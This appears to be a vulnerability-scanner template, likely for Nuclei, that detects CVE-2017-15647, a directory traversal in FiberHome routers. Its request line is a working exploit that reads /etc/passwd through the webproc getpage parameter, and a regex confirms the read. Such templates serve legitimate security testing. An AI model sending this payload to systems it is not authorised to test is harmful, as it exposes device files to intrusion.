33 lines
845 B
YAML
33 lines
845 B
YAML
id: CVE-2017-15647
|
|
|
|
info:
|
|
name: FiberHome - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/44054
|
|
- https://www.cvedetails.com/cve/CVE-2017-15647
|
|
tags: cve,cve2017,lfi,router
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2017-15647
|
|
cwe-id: CWE-22
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|